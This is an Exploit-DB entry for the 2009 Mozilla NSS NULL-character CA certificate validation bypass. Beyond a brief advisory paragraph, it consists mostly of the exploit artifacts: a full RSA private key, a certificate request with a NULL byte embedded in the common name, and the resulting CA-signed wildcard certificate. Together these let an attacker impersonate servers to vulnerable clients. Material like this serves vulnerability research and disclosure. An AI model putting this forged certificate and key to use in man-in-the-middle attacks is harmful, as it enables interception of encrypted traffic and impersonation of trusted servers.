Lucene search

K
exploitdbDan KaminskyEDB-ID:10071
HistoryNov 10, 2009 - 12:00 a.m.

Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass

2009-11-1000:00:00
Dan Kaminsky
www.exploit-db.com
101

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/35888/info

Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.

The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.

Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.

NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).

Private-Key: (1024 bit)
modulus:
    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
    ce:f0:82:33:d8:76:06:4c:9f
publicExponent: 65537 (0x10001)
privateExponent:
    00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
    3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
    6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
    51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
    c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
    06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
    35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
    28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
    57:2c:78:a9:42:b2:49:d8:71
prime1:
    00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
    0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
    2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
    96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
    e6:3a:40:99:03
prime2:
    00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
    17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
    e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
    c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
    49:79:53:35:35
exponent1:
    15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
    66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
    8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
    88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
    77:eb:0d:c1
exponent2:
    5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
    be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
    78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
    85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
    2d:92:6e:ed
coefficient:
    00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
    8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
    a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
    12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
    e6:c2:29:86:17
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
                    5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
                    c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
                    6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
                    72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
                    29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
                    bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
                    93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
                    ce:f0:82:33:d8:76:06:4c:9f
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: md5WithRSAEncryption
        64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
        c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
        a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
        0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
        d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
        70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
        f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
        a2:dc
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
otw=
-----END CERTIFICATE REQUEST-----
-----BEGIN CERTIFICATE-----
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
-----END CERTIFICATE-----